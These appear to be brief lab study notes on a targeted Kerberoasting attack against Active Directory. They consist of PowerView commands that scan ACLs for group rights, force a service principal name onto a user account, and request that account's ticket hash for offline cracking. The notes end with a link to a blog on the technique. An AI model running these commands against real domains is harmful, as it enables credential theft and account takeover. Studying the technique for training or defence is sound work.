. .\\PowerView_dev.ps1

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Check If user has SPN

Get-DomainUser -Identity support648user

when no

Force SPN

Set-DomainObject -Identity support648user -Set @{serviceprincipalname='dcorp/You Have Been Hacked'}

Add-Type -AssemblyName System.IdentityModel

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/406cb2d1-7db1-4145-86f8-25e869a8c847/Untitled.png

Requesting Hash

Get-DomainUser -Identity support648user | Get-DomainSPNTicket | select -ExpandProperty Hash

Kerberos AD Attacks - Kerberoasting

[Blog] Kerberoasting - Exploiting Kerberos to Compromise Microsoft Active Directory | Secura - Insight Into Your Digital Security